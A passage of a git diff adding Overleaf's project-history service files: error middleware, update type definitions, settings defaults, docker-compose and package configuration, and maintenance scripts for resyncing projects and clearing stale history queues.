lastUpdate: truncateFn, +}) + +export const app = express() +app.use(bodyParser.json()) +app.use(bodyParser.urlencoded({ extended: true })) +app.use(Metrics.http.monitor(logger)) +Router.initialize(app) +Metrics.injectMetricsRoute(app) +app.use(Validation.errorMiddleware) +app.use(function (error, req, res, next) { + if (error instanceof Errors.NotFoundError) { + res.sendStatus(404) + } else if (error instanceof Errors.BadRequestError) { + res.sendStatus(400) + } else if (error instanceof Errors.InconsistentChunkError) { + res.sendStatus(422) + } else if (error instanceof Errors.TooManyRequestsError) { + res.status(429).set('Retry-After', 300).end() + } else { + logger.error({ err: error, req }, error.message) + res.status(500).json({ message: 'an internal error occurred' }) + } +}) diff --git a/services/project-history/app/js/types.ts b/services/project-history/app/js/types.ts new file mode 100644 index 0000000..c2b0d83 --- /dev/null +++ b/services/project-history/app/js/types.ts @@ -0,0 +1,253 @@ +import { HistoryRanges } from '../../../document-updater/app/js/types' +import { LinkedFileData, RawOrigin } from 'overleaf-editor-core/lib/types' + +export type Update = + | TextUpdate + | AddDocUpdate + | AddFileUpdate + | RenameUpdate + | DeleteCommentUpdate + | SetCommentStateUpdate + | SetFileMetadataOperation + | ResyncProjectStructureUpdate + | ResyncDocContentUpdate + +export type ProjectStructureUpdate = + | AddDocUpdate + | AddFileUpdate + | RenameUpdate + | SetFileMetadataOperation + +export type UpdateMeta = { + user_id: string + ts: number + source?: string + type?: string + origin?: RawOrigin + tc?: string + resync?: boolean +} + +export type TextUpdate = { + doc: string + op: Op[] + v: number + meta: UpdateMeta & { + pathname: string + doc_length: number + doc_hash?: string + history_doc_length?: number + } +} + +export type SetCommentStateUpdate = { + pathname: string + commentId: string + resolved: boolean + meta: UpdateMeta +} + +export type SetFileMetadataOperation = { + pathname: string + meta: UpdateMeta + metadata: LinkedFileData | object +} + +export type DeleteCommentUpdate = { + pathname: string + deleteComment: string + meta: UpdateMeta +} + +type ProjectUpdateBase = { + version: string + projectHistoryId: string + meta: UpdateMeta + doc: string +} + +export type AddDocUpdate = ProjectUpdateBase & { + pathname: string + docLines: string + ranges?: HistoryRanges +} + +export type AddFileUpdate = ProjectUpdateBase & { + pathname: string + file: string + url: string + hash: string + createdBlob?: boolean + metadata?: LinkedFileData +} + +export type RenameUpdate = ProjectUpdateBase & { + pathname: string + new_pathname: string +} + +export type ResyncProjectStructureUpdate = { + resyncProjectStructure: { + docs: Doc[] + files: File[] + } + projectHistoryId: string + meta: { + ts: string + } + // optional fields for resyncProjectStructureOnly=true + resyncProjectStructureOnly?: boolean + _raw: string +} + +export type ResyncDocContentUpdate = { + resyncDocContent: { + content: string + version: number + ranges?: Ranges + resolvedCommentIds?: string[] + } + projectHistoryId: string + path: string + doc: string + meta: { + ts: string + } +} + +export type Op = RetainOp | InsertOp | DeleteOp | CommentOp + +export type RetainOp = { + r: string + p: number + hpos?: number + tracking?: TrackingDirective +} + +export type InsertOp = { + i: string + p: number + u?: boolean + hpos?: number + trackedDeleteRejection?: boolean + commentIds?: string[] +} + +export type DeleteOp = { + d: string + p: number + u?: boolean + hpos?: number + trackedChanges?: TrackedChangesInsideDelete[] +} + +export type TrackedChangesInsideDelete = { + type: 'insert' | 'delete' + offset: number + length: number +} + +export type CommentOp = { + c: string + p: number + t: string + hpos?: number + hlen?: number + resolved?: boolean +} + +export type UpdateWithBlob<T extends Update = Update> = { + update: T + blobHashes: T extends AddDocUpdate | AddFileUpdate + ? { + file: string + ranges?: string + } + : never +} + +export type TrackingProps = { + type: 'insert' | 'delete' + userId: string + ts: string +} + +export type TrackingDirective = TrackingProps | { type: 'none' } + +export type TrackingType = 'insert' | 'delete' | 'none' + +export type RawScanOp = + | number + | string + | { r: number; tracking?: TrackingDirective } + | { i: string; tracking?: TrackingProps; commentIds?: string[] } + | { d: number } + +export type TrackedChangeSnapshot = { + op: { + p: number + } & ({ d: string } | { i: string }) + metadata: { + ts: string + user_id: string + } +} + +export type CommentSnapshot = { + op: { + p: number + t: string + c: string + resolved: boolean + } +} + +export type RangesSnapshot = { + changes: TrackedChangeSnapshot[] + comments: CommentSnapshot[] +} + +export type Doc = { + doc: string + path: string +} + +export type File = { + file: string + url?: string + path: string + _hash?: string + createdBlob?: boolean + metadata?: LinkedFileData +} + +export type Entity = Doc | File + +export type Ranges = { + comments?: Comment[] + changes?: TrackedChange[] +} + +export type Comment = { + id: string + op: CommentOp + metadata: { + user_id: string + ts: string + } +} + +export type TrackedChange = { + id: string + op: InsertOp | DeleteOp + metadata: { + user_id: string + ts: string + } +} + +export type TrackedChangeTransition = { + pos: number + tracking: TrackingDirective + stage: 'persisted' | 'expected' +} diff --git a/services/project-history/buildscript.txt b/services/project-history/buildscript.txt new file mode 100644 index 0000000..be5e751 --- /dev/null +++ b/services/project-history/buildscript.txt @@ -0,0 +1,9 @@ +project-history +--dependencies=mongo,redis +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/services/project-history/config/settings.defaults.cjs b/services/project-history/config/settings.defaults.cjs new file mode 100644 index 0000000..9e5a398 --- /dev/null +++ b/services/project-history/config/settings.defaults.cjs @@ -0,0 +1,109 @@ +const http = require('node:http') +const https = require('node:https') + +http.globalAgent.keepAlive = false +https.globalAgent.keepAlive = false + +module.exports = { + mongo: { + url: + process.env.MONGO_CONNECTION_STRING || + `mongodb://${process.env.MONGO_HOST || '127.0.0.1'}/sharelatex`, + options: { + monitorCommands: true, + }, + }, + internal: { + history: { + port: 3054, + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + }, + }, + apis: { + documentupdater: { + url: `http://${process.env.DOCUPDATER_HOST || '127.0.0.1'}:3003`, + }, + docstore: { + url: `http://${process.env.DOCSTORE_HOST || '127.0.0.1'}:3016`, + }, + filestore: { + enabled: process.env.FILESTORE_ENABLED !== 'false', + url: `http://${process.env.FILESTORE_HOST || '127.0.0.1'}:3009`, + }, + web: { + url: `http://${ + process.env.WEB_API_HOST || process.env.WEB_HOST || '127.0.0.1' + }:${process.env.WEB_PORT || 3000}`, + user: process.env.WEB_API_USER || 'overleaf', + pass: process.env.WEB_API_PASSWORD || 'password', + historyIdCacheSize: parseInt( + process.env.HISTORY_ID_CACHE_SIZE || '10000', + 10 + ), + }, + project_history: { + url: `http://${process.env.PROJECT_HISTORY_HOST || '127.0.0.1'}:3054`, + }, + }, + redis: { + lock: { + host: process.env.REDIS_HOST || '127.0.0.1', + password: process.env.REDIS_PASSWORD, + port: process.env.REDIS_PORT || 6379, + key_schema: { + projectHistoryLock({ project_id: projectId }) { + return `ProjectHistoryLock:{${projectId}}` + }, + }, + }, + project_history: { + host: + process.env.HISTORY_REDIS_HOST || process.env.REDIS_HOST || '127.0.0.1', + port: process.env.HISTORY_REDIS_PORT || process.env.REDIS_PORT || 6379, + password: + process.env.HISTORY_REDIS_PASSWORD || process.env.REDIS_PASSWORD, + key_schema: { + projectHistoryOps({ project_id: projectId }) { + return `ProjectHistory:Ops:{${projectId}}` + }, + projectHistoryFirstOpTimestamp({ project_id: projectId }) { + return `ProjectHistory:FirstOpTimestamp:{${projectId}}` + }, + projectHistoryCachedHistoryId({ project_id: projectId }) { + return `ProjectHistory:CachedHistoryId:{${projectId}}` + }, + }, + }, + }, + + history: { + healthCheck: { + project_id: process.env.HEALTH_CHECK_PROJECT_ID || '', + }, + }, + + overleaf: { + history: { + host: + process.env.V1_HISTORY_FULL_HOST || + `http://${ + process.env.V1_HISTORY_HOST || + process.env.HISTORY_V1_HOST || + '127.0.0.1' + }:3100/api`, + user: process.env.V1_HISTORY_USER || 'staging', + pass: process.env.V1_HISTORY_PASSWORD || 'password', + sync: { + retries_max: 30, + interval: 2, + }, + requestTimeout: parseInt(process.env.V1_REQUEST_TIMEOUT || '300000', 10), + }, + }, + + path: { + uploadFolder: process.env.UPLOAD_FOLDER || '/tmp/', + }, + + maxFileSizeInBytes: 100 * 1024 * 1024, // 100 megabytes +} diff --git a/services/project-history/docker-compose.ci.yml b/services/project-history/docker-compose.ci.yml new file mode 100644 index 0000000..6deaad4 --- /dev/null +++ b/services/project-history/docker-compose.ci.yml @@ -0,0 +1,65 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + mongo: + condition: service_started + redis: + condition: service_healthy + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + redis: + image: redis + healthcheck: + test: ping="$$(redis-cli ping)" && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 diff --git a/services/project-history/docker-compose.yml b/services/project-history/docker-compose.yml new file mode 100644 index 0000000..deed9c5 --- /dev/null +++ b/services/project-history/docker-compose.yml @@ -0,0 +1,69 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/project-history + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/project-history + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/project-history + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/project-history + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + redis: + condition: service_healthy + command: npm run --silent test:acceptance + + redis: + image: redis + healthcheck: + test: ping=$$(redis-cli ping) && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + diff --git a/services/project-history/package.json b/services/project-history/package.json new file mode 100644 index 0000000..2a54a80 --- /dev/null +++ b/services/project-history/package.json @@ -0,0 +1,53 @@ +{ + "name": "@overleaf/project-history", + "description": "An API for saving and compressing individual document updates into a browseable history", + "private": true, + "main": "app.js", + "type": "module", + "scripts": { + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "start": "node app.js", + "nodemon": "node --watch app.js", + "test:acceptance:_run": "LOG_LEVEL=fatal mocha --loader=esmock --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:unit:_run": "LOG_LEVEL=fatal mocha --loader=esmock --recursive --reporter spec $@ test/unit/js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "aws-sdk": "^2.650.0", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "celebrate": "^15.0.3", + "diff-match-patch": "overleaf/diff-match-patch#89805f9c671a77a263fc53461acd62aa7498f688", + "esmock": "^2.6.3", + "express": "^4.21.2", + "lodash": "^4.17.20", + "minimist": "^1.2.8", + "mongodb-legacy": "6.1.3", + "overleaf-editor-core": "*", + "p-queue": "^8.1.0", + "request": "^2.88.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "nock": "^13.5.3", + "sinon": "~9.0.1", + "sinon-chai": "^3.7.0", + "timekeeper": "2.2.0", + "typescript": "^5.0.4" + } +} diff --git a/services/project-history/scripts/add_index_for_sync_state.js b/services/project-history/scripts/add_index_for_sync_state.js new file mode 100644 index 0000000..0c17197 --- /dev/null +++ b/services/project-history/scripts/add_index_for_sync_state.js @@ -0,0 +1,21 @@ +/* eslint-env mongo */ + +// add a TTL index to expire entries for completed resyncs in the +// projectHistorySyncState collection. The entries should only be expired if +// resyncProjectStructure is false and resyncDocContents is a zero-length array. + +const now = Date.now() +const inTheFuture = now + 24 * 3600 * 1000 + +db.projectHistorySyncState.ensureIndex( + { expiresAt: 1 }, + { expireAfterSeconds: 0, background: true } +) +db.projectHistorySyncState.updateMany( + { + resyncProjectStructure: false, + resyncDocContents: [], + expiresAt: { $exists: false }, + }, + { $set: { expiresAt: new Date(inTheFuture) } } +) diff --git a/services/project-history/scripts/bulk_resync_file_fix_up.mjs b/services/project-history/scripts/bulk_resync_file_fix_up.mjs new file mode 100644 index 0000000..10ea18b --- /dev/null +++ b/services/project-history/scripts/bulk_resync_file_fix_up.mjs @@ -0,0 +1,328 @@ +// @ts-check +import Events from 'node:events' +import { setTimeout } from 'node:timers/promises' +import readline from 'node:readline' +import fs from 'node:fs' +import minimist from 'minimist' +import { ObjectId } from 'mongodb' +import { batchedUpdate } from '@overleaf/mongo-utils/batchedUpdate.js' +import logger from '@overleaf/logger' +import Metrics from '@overleaf/metrics' +import OError from '@overleaf/o-error' +import { promiseMapWithLimit } from '@overleaf/promise-utils' +import { db, mongoClient } from '../app/js/mongodb.js' +import * as HistoryStoreManager from '../app/js/HistoryStoreManager.js' +import * as RedisManager from '../app/js/RedisManager.js' +import * as SyncManager from '../app/js/SyncManager.js' +import * as UpdatesProcessor from '../app/js/UpdatesProcessor.js' +import { NeedFullProjectStructureResyncError } from '../app/js/Errors.js' +import * as ErrorRecorder from '../app/js/ErrorRecorder.js' + +// Silence warning. +Events.setMaxListeners(20) + +// Enable caching for ObjectId.toString() +ObjectId.cacheHexString = true + +const READ_CONCURRENCY = parseInt(process.env.READ_CONCURRENCY || '100', 10) +const WRITE_CONCURRENCY = parseInt(process.env.WRITE_CONCURRENCY || '10', 10) +const FLUSH_RETRIES = parseInt(process.env.FLUSH_RETRIES || '20', 10) + +// Relevant dates: +// - 2024-12-19, start of event-hold removal in filestore bucket -> objects older than 24h are (soft-)deleted. +// - 2024-12-23, copy operation skipped in filestore when cloning project -> objects not created on clone. +// - 2025-01-24, no more filestore reads allowed in project-history -> no more empty files in history for 404s +const FILESTORE_SOFT_DELETE_START = new Date('2024-12-19T00:00:00Z') +const FILESTORE_READ_OFF = new Date('2025-01-24T15:00:00Z') + +const argv = minimist(process.argv.slice(2), { + string: ['logs', 'log-latency'], +}) +const LOG_LATENCY = argv['log-latency'] === 'true' + +let gracefulShutdownInitiated = false + +process.on('SIGINT', handleSignal) +process.on('SIGTERM', handleSignal) + +function handleSignal() { + gracefulShutdownInitiated = true + console.warn('graceful shutdown initiated, draining queue') +} + +const STATS = { + processedLines: 0, + success: 0, + changed: 0, + failure: 0, + skipped: 0, + checkFailure: 0, +} + +function logStats() { + console.log( + JSON.stringify({ + time: new Date(), + gracefulShutdownInitiated, + ...STATS, + }) + ) +} +const logInterval = setInterval(logStats, 10_000) + +/** + * @typedef {Object} FileRef + * @property {ObjectId} _id + * @property {any} linkedFileData + */ + +/** + * @typedef {Object} Folder + * @property {Array<Folder>} folders + * @property {Array<FileRef>} fileRefs + */ + +/** + * @typedef {Object} Project + * @property {ObjectId} _id + * @property {Date} lastUpdated + * @property {Array<Folder>} rootFolder + * @property {{history: {id: (number|string)}}} overleaf + */ + +/** + * @param {Folder} folder + * @return {boolean} + */ +function checkFileTreeNeedsResync(folder) { + if (!folder) return false + if (Array.isArray(folder.fileRefs)) { + for (const fileRef of folder.fileRefs) { + if (fileRef.linkedFileData) return true + if (fileRef._id.getTimestamp() > FILESTORE_SOFT_DELETE_START) return true + } + } + if (Array.isArray(folder.folders)) { + for (const child of folder.folders) { + if (checkFileTreeNeedsResync(child)) return true + } + } + return false +} + +/** + * @param {string} projectId + * @param {string} historyId + * @return {Promise<Date>} + */ +async function getLastEndTimestamp(projectId, historyId) { + const raw = await HistoryStoreManager.promises.getMostRecentVersionRaw( + projectId, + historyId, + { readOnly: true } + ) + if (!raw) throw new Error('bug: history not initialized') + return raw.endTimestamp +} + +/** @type {Record<string, (project: Project) => Promise<boolean>>} */ +const conditions = { + // cheap: in-memory mongo lookup + 'updated after filestore soft-delete': async function (project) { + return project.lastUpdated > FILESTORE_SOFT_DELETE_START + }, + // cheap: in-memory mongo lookup + 'file-tree requires re-sync': async function (project) { + return checkFileTreeNeedsResync(project.rootFolder?.[0]) + }, + // moderate: GET from Redis + 'has pending operations': async function (project) { + const n = await RedisManager.promises.countUnprocessedUpdates( + project._id.toString() + ) + return n > 0 + }, + // expensive: GET from Mongo/Postgres via history-v1 HTTP API call + 'has been flushed after filestore soft-delete': async function (project) { + // Resyncs started after soft-deleting can trigger 404s and result in empty files. + const endTimestamp = await getLastEndTimestamp( + project._id.toString(), + project.overleaf.history.id.toString() + ) + return endTimestamp > FILESTORE_SOFT_DELETE_START + }, +} + +/** + * @param {Project} project + * @return {Promise<{projectId: string, historyId: string} | null>} + */ +async function checkProject(project) { + if (gracefulShutdownInitiated) return null + if (project._id.getTimestamp() > FILESTORE_READ_OFF) { + STATS.skipped++ // Project created after all bugs were fixed. + return null + } + const projectId = project._id.toString() + const historyId = project.overleaf.history.id.toString() + for (const [condition, check] of Object.entries(conditions)) { + try { + if (await check(project)) return { projectId, historyId } + } catch (err) { + logger.err({ projectId, condition, err }, 'failed to check project') + STATS.checkFailure++ + return null + } + } + STATS.skipped++ + return null +} + +/** + * @param {string} projectId + * @param {string} historyId + * @return {Promise<void>} + */ +async function processProject(projectId, historyId) { + if (gracefulShutdownInitiated) return + const t0 = performance.now() + try { + await tryProcessProject(projectId, historyId) + const latency = performance.now() - t0 + if (LOG_LATENCY) { + logger.info({ projectId, historyId, latency }, 'processed project') + } + STATS.success++ + } catch (err) { + logger.err({ err, projectId, historyId }, 'failed to process project') + STATS.failure++ + } +} + +/** + * @param {string} projectId + * @return {Promise<void>} + */ +async function flushWithRetries(projectId) { + for (let attempt = 0; attempt < FLUSH_RETRIES; attempt++) { + try { + await UpdatesProcessor.promises.processUpdatesForProject(projectId) + return + } catch (err) { + logger.warn( + { projectId, err, attempt }, + 'failed to flush updates, trying again' + ) + if (gracefulShutdownInitiated) throw err + } + } + + try { + await UpdatesProcessor.promises.processUpdatesForProject(projectId) + } catch (err) { + // @ts-ignore err is Error + throw new OError('failed to flush updates', {}, err) + } +} + +/** + * @param {string} projectId + * @param {string} historyId + * @return {Promise<void>} + */ +async function tryProcessProject(projectId, historyId) { + await flushWithRetries(projectId) + const start = new Date() + let needsFullSync = false + try { + await UpdatesProcessor.promises.startResyncAndProcessUpdatesUnderLock( + projectId, + { resyncProjectStructureOnly: true } + ) + } catch (err) { + if (err instanceof NeedFullProjectStructureResyncError) { + needsFullSync = true + } else { + throw err + } + } + if (needsFullSync) { + logger.warn( + { projectId, historyId }, + 'structure only resync not sufficient, doing full soft resync' + ) + await SyncManager.promises.startResync(projectId, {}) + await UpdatesProcessor.promises.processUpdatesForProject(projectId) + STATS.changed++ + } else { + const after = await getLastEndTimestamp(projectId, historyId) + if (after > start) { + STATS.changed++ + } + } + // Avoid db.projectHistorySyncState from growing for each project we resynced. + // MongoDB collections cannot shrink on their own. In case of success, purge + // the db entry created by this script right away. + await SyncManager.promises.clearResyncStateIfAllAfter(projectId, start) +} + +async function processBatch(projects) { + const projectIds = ( + await promiseMapWithLimit(READ_CONCURRENCY, projects, checkProject) + ).filter(id => !!id) + await promiseMapWithLimit(WRITE_CONCURRENCY, projectIds, ids => + processProject(ids.projectId, ids.historyId) + ) + + if (gracefulShutdownInitiated) throw new Error('graceful shutdown triggered') +} + +async function processProjectsFromLog() { + const rl = readline.createInterface({ + input: fs.createReadStream(argv.logs), + }) + for await (const line of rl) { + if (gracefulShutdownInitiated) break + STATS.processedLines++ + if (!line.startsWith('{')) continue + const { projectId, historyId, msg } = JSON.parse(line) + if (msg !== 'failed to process project') continue + await processProject(projectId, historyId) // does try/catch with logging + } +} + +async function main() { + if (argv.logs) { + await processProjectsFromLog() + return + } + await batchedUpdate(db.projects, {}, processBatch, { + _id: 1, + lastUpdated: 1, + 'overleaf.history': 1, + rootFolder: 1, + }) +} + +try { + try { + await main() + } finally { + clearInterval(logInterval) + logStats() + Metrics.close() + await mongoClient.close() + // TODO(das7pad): graceful shutdown for redis. Refactor process.exit when done. + } + console.log('Done.') + await setTimeout(1_000) + if (STATS.failure) { + process.exit(Math.min(STATS.failure, 99)) + } else { + process.exit(0) + } +} catch (err) { + logger.err({ err }, 'fatal error') + await setTimeout(1_000) + process.exit(100) +} diff --git a/services/project-history/scripts/clear_dangling_timestamps.js b/services/project-history/scripts/clear_dangling_timestamps.js new file mode 100644 index 0000000..e83eb1d --- /dev/null +++ b/services/project-history/scripts/clear_dangling_timestamps.js @@ -0,0 +1,43 @@ +#!/usr/bin/env node + +// Clear timestamps which don't have any corresponding history ops +// usage: scripts/flush_all.js <limit> + +import logger from '@overleaf/logger' +import * as RedisManager from '../app/js/RedisManager.js' + +const argv = process.argv.slice(2) +const limit = parseInt(argv[0], 10) || null + +// find all dangling timestamps and clear them +async function main() { + logger.info( + { limit }, + 'running redis scan for project timestamps, this may take a while' + ) + const projectIdsWithFirstOpTimestamps = + await RedisManager.promises.getProjectIdsWithFirstOpTimestamps(limit) + const totalTimestamps = projectIdsWithFirstOpTimestamps.length + logger.info( + { totalTimestamps }, + 'scan completed, now clearing dangling timestamps' + ) + let clearedTimestamps = 0 + let processed = 0 + for (const projectId of projectIdsWithFirstOpTimestamps) { + const result = + await RedisManager.promises.clearDanglingFirstOpTimestamp(projectId) + processed++ + clearedTimestamps += result + if (processed % 1000 === 0) { + logger.info( + { processed, totalTimestamps, clearedTimestamps }, + 'clearing timestamps' + ) + } + } + logger.info({ processed, totalTimestamps, clearedTimestamps }, 'completed') + process.exit(0) +} + +main() diff --git a/services/project-history/scripts/clear_deleted.js b/services/project-history/scripts/clear_deleted.js new file mode 100755 index 0000000..a4a6919 --- /dev/null +++ b/services/project-history/scripts/clear_deleted.js @@ -0,0 +1,136 @@ +#!/usr/bin/env node + +import async from 'async' +import logger from '@overleaf/logger' +import Settings from '@overleaf/settings' +import redis from '@overleaf/redis-wrapper' +import { db, ObjectId } from '../app/js/mongodb.js' + +logger.logger.level('fatal') + +const rclient = redis.createClient(Settings.redis.project_history) +const Keys = Settings.redis.project_history.key_schema + +const argv = process.argv.slice(2) +const limit = parseInt(argv[0], 10) || null +const force = argv[1] === 'force' || false +let delay = 0 + +function checkAndClear(project, callback) { + const projectId = project.project_id + function checkDeleted(cb) { + db.projects.findOne( + { _id: new ObjectId(projectId) }, + { projection: { _id: 1 } }, + (err, result) => { + if (err) { + cb(err) + } else if (!result) { + // project not found, but we still need to look at deletedProjects + cb() + } else { + console.log(`Project ${projectId} found in projects`) + cb(new Error('error: project still exists')) + } + } + ) + } + + function checkRecoverable(cb) { + db.deletedProjects.findOne( + { + // this condition makes use of the index + 'deleterData.deletedProjectId': new ObjectId(projectId), + // this condition checks if the deleted project has expired + 'project._id': new ObjectId(projectId), + }, + { projection: { _id: 1 } }, + (err, result) => { + if (err) { + cb(err) + } else if (!result) { + console.log( + `project ${projectId} has been deleted - safe to clear queue` + ) + cb() + } else { + console.log(`Project ${projectId} found in deletedProjects`) + cb(new Error('error: project still exists')) + } + } + ) + } + + function clearRedisQueue(cb) { + const key = Keys.projectHistoryOps({ project_id: projectId }) + delay++ + if (force) { + console.log('setting redis key', key, 'to expire in', delay, 'seconds') + // use expire to allow redis to delete the key in the background + rclient.expire(key, delay, err => { + cb(err) + }) + } else { + console.log( + 'dry run, would set key', + key, + 'to expire in', + delay, + 'seconds' + ) + cb() + } + } + + function clearMongoEntry(cb) { + if (force) { + console.log('deleting key in mongo projectHistoryFailures', projectId) + db.projectHistoryFailures.deleteOne({ project_id: projectId }, cb) + } else { + console.log('would delete failure record for', projectId, 'from mongo') + cb() + } + } + + // do the checks and deletions + async.waterfall( + [checkDeleted, checkRecoverable, clearRedisQueue, clearMongoEntry], + err => { + if (!err || err.message === 'error: project still exists') { + callback() + } else { + console.log('error:', err) + callback(err) + } + } + ) +} + +// find all the broken projects from the failure records +async function main() { + const results = await db.projectHistoryFailures.find({}).toArray() + processFailures(results) +} + +main().catch(error => { + console.error(error) + process.exit(1) +}) + +function processFailures(results) { + if (argv.length === 0) { + console.log(` +Usage: node clear_deleted.js [QUEUES] [FORCE] + +where + QUEUES is the number of queues to process + FORCE is the string "force" when we're ready to delete the queues. Without it, this script does a dry-run +`) + } + console.log('number of stuck projects', results.length) + // now check if the project is truly deleted in mongo + async.eachSeries(results.slice(0, limit), checkAndClear, err => { + console.log('DONE', err) + process.exit() + }) +} diff --git a/services/project-history/scripts/clear_deleted_history.js b/services/project-history/scripts/clear_deleted_history.js new file mode 100755 index 0000000..899146a --- /dev/null +++ b/services/project-history/scripts/clear_deleted_history.js @@ -0,0 +1,175 @@ +#!/usr/bin/env node + +// To run in dev: +// +// docker compose run --rm project-history scripts/clear_deleted.js +// +// In production: +// +// docker run --rm $(docker ps -lq) scripts/clear_deleted.js + +import async from 'async' +import logger from '@overleaf/logger' +import Settings from '@overleaf/settings' +import redis from '@overleaf/redis-wrapper' +import { db, ObjectId } from '../app/js/mongodb.js' + +logger.logger.level('fatal') + +const rclient = redis.createClient(Settings.redis.project_history) +const Keys = Settings.redis.project_history.key_schema + +const argv = process.argv.slice(2) +const limit = parseInt(argv[0], 10) || null +const force = argv[1] === 'force' || false +let projectNotFoundErrors = 0 +let projectImportedFromV1Errors = 0 +const projectsNotFound = [] +const projectsImportedFromV1 = [] +let projectWithHistoryIdErrors = 0 +const projectsWithHistoryId = [] + +function checkAndClear(project, callback) { + const projectId = project.project_id + console.log('checking project', projectId) + + function checkDeleted(cb) { + db.projects.findOne( + { _id: new ObjectId(projectId) }, + { projection: { overleaf: true } }, + (err, result) => { + console.log( + '1. looking in mongo projects collection: err', + err, + 'result', + JSON.stringify(result) + ) + if (err) { + return cb(err) + } + if (!result) { + return cb(new Error('project not found in mongo')) + } + if ( + result && + result.overleaf && + !result.overleaf.id && + result.overleaf.history && + !result.overleaf.history.id && + result.overleaf.history.deleted_id + ) { + console.log( + ' - project is not imported from v1 and has a deleted_id - ok to clear' + ) + return cb() + } else if (result && result.overleaf && result.overleaf.id) { + console.log(' - project is imported from v1') + return cb( + new Error('project is imported from v1 - will not clear it') + ) + } else if ( + result && + result.overleaf && + result.overleaf.history && + result.overleaf.history.id + ) { + console.log(' - project has a history id') + return cb(new Error('project has a history id - will not clear it')) + } else { + console.log(' - project state not recognised') + return cb(new Error('project state not recognised')) + } + } + ) + } + + function clearRedisQueue(cb) { + const key = Keys.projectHistoryOps({ project_id: projectId }) + if (force) { + console.log('deleting redis key', key) + rclient.del(key, err => { + cb(err) + }) + } else { + console.log('dry run, would deleted key', key) + cb() + } + } + + function clearMongoEntry(cb) { + if (force) { + console.log('deleting key in mongo projectHistoryFailures', projectId) + db.projectHistoryFailures.deleteOne( + { project_id: projectId }, + (err, result) => { + console.log('got result from remove', err, result) + cb(err) + } + ) + } else { + console.log('would delete failure record for', projectId, 'from mongo') + cb() + } + } + + // do the checks and deletions + async.waterfall([checkDeleted, clearRedisQueue, clearMongoEntry], err => { + if (!err) { + if (force) { + return setTimeout(callback, 100) + } // include a 1 second delay + return callback() + } else if (err.message === 'project not found in mongo') { + projectNotFoundErrors++ + projectsNotFound.push(projectId) + return callback() + } else if (err.message === 'project has a history id - will not clear it') { + projectWithHistoryIdErrors++ + projectsWithHistoryId.push(projectId) + return callback() + } else if ( + err.message === 'project is imported from v1 - will not clear it' + ) { + projectImportedFromV1Errors++ + projectsImportedFromV1.push(projectId) + return callback() + } else { + console.log('error:', err) + return callback(err) + } + }) +} + +// find all the broken projects 